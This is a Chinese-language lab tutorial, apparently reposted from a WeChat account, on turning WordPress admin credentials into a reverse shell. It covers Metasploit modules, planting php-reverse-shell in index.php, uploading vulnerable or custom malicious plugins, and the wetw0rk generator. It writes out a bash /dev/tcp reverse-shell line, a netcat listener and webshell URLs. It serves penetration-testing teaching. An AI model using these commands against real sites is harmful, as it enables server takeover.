WordPress:反向 Shell

admin 2024年12月28日22:28:46评论23 views字数 3178阅读10分35秒阅读模式

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

这篇文章重点介绍 WordPress 安全测试,以探索通过入侵管理控制台来利用 WordPress 的程序。我们已经在本地机器上设置了 WordPress,但如果您想了解 WordPress 的安装和配置,请访问以下链接:
Ubuntu 中的 WordPress 实验室设置
我们知道,WPScan 是一款用于识别 WordPress 中存在漏洞的插件和主题的独立工具。但是,本文不会介绍 WPScan 教程。

要求:

主机:WordPress

攻击机器:Kali Linux

WordPress 凭证:raj: 123(在我们的例子中)

开始吧!!

如您所见,我可以通过 Web 浏览器访问 WordPress 管理控制台。要获取 Web Shell,我们需要利用此 CMS。有多种方法可以利用 WordPress;让我们探索其中的一些操作。

WordPress:反向 Shell

Metasploit框架

第一种方法是使用 Metasploit 框架。此模块需要管理员用户名和密码,登录管理面板,并上传打包为 WordPress 插件的有效负载。由于这是经过验证的代码执行,因此它应该适用于所有版本的 WordPress,从而导致与 Web 服务器建立 Meterpreter 会话。

msf > use exploit/unix/webapp/wp_admin_shell_uploadmsf exploit(wp_admin_shell_upload) > set USERNAME adminmsf exploit(wp_admin_shell_upload) > set PASSWORD adminmsf exploit(wp_admin_shell_upload) > set targeturi /wordpressmsf exploit(wp_admin_shell_upload) > exploit
太棒了!它运行完美,如您所见,我们已成功通过 Meterpreter 会话获得与 Web 服务器的反向连接。

注入恶意代码

生成 Web 服务器 shell 的另一种技术是注入恶意代码。如果您有管理员的用户名和密码,请登录管理面板并将恶意 PHP 代码注入 index.php 文件(即网站的入口点)。

为此,请导航到 WordPress 仪表板,单击左侧菜单中的“插件”,然后单击“添加新插件”。

WordPress:反向 Shell
在搜索栏中输入“高级文件管理器”并通过“modalweb”找到插件。
WordPress:反向 Shell

安装并激活插件:

单击“立即安装”,然后单击“激活”以在您的 WordPress 网站上启用该插件。

WordPress:反向 Shell
激活后,转到左侧菜单中的“文件管理器”选项。
WordPress:反向 Shell

使用文件管理器浏览 WordPress 安装的文件系统。此界面允许您直接查看、上传和编辑文件。

在 WordPress 中,右键单击 index.php 并选择“编辑”。在进行任何更改之前,请创建该文件的副本,以便以后需要时可以恢复它。

WordPress:反向 Shell
在 kali 上,打开并复制 /usr/share/webshells/php/php-reverse-shell.php 中的代码
WordPress:反向 Shell

将以下代码粘贴到 index.php 文件中,使用 Kali 机器的 IP 和端口号更新 IP 地址。然后单击“保存并关闭”按钮。

接下来,在你的 Kali 机器上打开一个终端并启动 Netcat:

rlwrap nc -lvnp 1234
WordPress:反向 Shell
尝试在另一个浏览器选项卡中访问 wordpress 页面,这将为我们带来反向 shell。
WordPress:反向 Shell

注入恶意插件

有时,登录用户可能没有修改 WordPress 主题所需的写入权限。在这种情况下,注入恶意 WP 插件是获取 Web Shell 的另一种策略。

一旦你可以访问 WordPress 仪表板,你就可以尝试安装恶意插件。在此示例中,我已经从 Exploit DB 下载了一个易受攻击的插件。

WordPress:反向 Shell

现在我们有了插件的 ZIP 文件,是时候上传它了。

仪表板 > 插件 > 上传插件

在“插件”菜单中,点击“添加新插件”,然后点击“上传插件”。选择你的恶意插件 ZIP 文件,然后点击“立即安装”。

WordPress:反向 Shell

上传后,点击“激活”即可启用该插件。

一旦一切设置正确,您就可以继续利用漏洞了。我们安装了一个名为“reflex-gallery”的易受攻击的插件,众所周知,该插件很容易被利用。

要利用此漏洞,可以使用 Metasploit 框架。加载以下模块并执行提供的命令:

use exploit/unix/webapp/wp_reflexgallery_file_uploadset rhosts 192.168.31.205set targeturi /wordpressexploit

上传后,点击“激活”即可启用该插件。

一旦一切设置正确,您就可以继续利用漏洞了。我们安装了一个名为“reflex-gallery”的易受攻击的插件,众所周知,该插件很容易被利用。

要利用此漏洞,可以使用 Metasploit 框架。加载以下模块并执行提供的命令:

use exploit/unix/webapp/wp_reflexgallery_file_uploadset rhosts 192.168.31.205set targeturi /wordpressexploit
WordPress:反向 Shell
执行上述命令后,你将建立一个 Meterpreter 会话。正如本文所演示的那样,有多种方法可以利用在 WordPress 平台上构建的网站。

注入自定义恶意插件

如前所述,我们上传了一个带有易用漏洞的插件。这次,我们将注入自定义生成的恶意插件以获取反向 shell。这个过程很简单:我们将反向 shell 的恶意代码保存在名为“revshell.php”的 PHP 文件中,并将其压缩为 ZIP 文件。

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")
WordPress:反向 Shell
WordPress:反向 Shell
重复前面的步骤上传“revshell.zip”插件文件,然后启动Netcat监听器建立与目标机器的反向连接。
WordPress:反向 Shell
一旦包成功安装,我们需要激活插件。
WordPress:反向 Shell
一旦您激活插件,它将建立反向连接,创建 Netcat 会话。
WordPress:反向 Shell

WetW0rk – 恶意 WordPress 插件

首先,我们需要从GitHub下载恶意的 WordPress 插件。该插件包含利用 WordPress 安装所需的代码。

在 Kali Linux 机器上打开终端并使用以下命令克隆存储库:

git clone https://github.com/wetw0rk/malicious-wordpress-plugin
切换到包含克隆存储库的目录。
WordPress:反向 Shell

接下来,我们需要生成恶意插件,将其上传到 WordPress 网站以利用它。

使用克隆存储库中的 wordpwn.py 脚本生成插件。将 <Kali_IP> 替换为您的 Kali 机器的 IP 地址,将 8888 替换为所需的端口号:

python wordpwn.py <Kali_IP> 8888 Y
WordPress:反向 Shell
运行脚本后,记下触发反向 shell 所提供的 URL。这些 URL 稍后将用于建立连接。
http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.phphttp://(target)/wp-content/plugins/malicious/QwertyRocks.phphttp://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls
该脚本还会启动 metasploit 框架作为进程的一部分,并等待反向 shell。
WordPress:反向 Shell

现在我们已经生成了恶意插件,我们可以继续将其上传到 WordPress 网站来利用它。

像我们之前做的那样上传插件。

WordPress:反向 Shell
WordPress:反向 Shell

原文始发于微信公众号(三沐数安):WordPress:反向 Shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月28日22:28:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress:反向 Shellhttps://cn-sec.com/archives/3493409.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息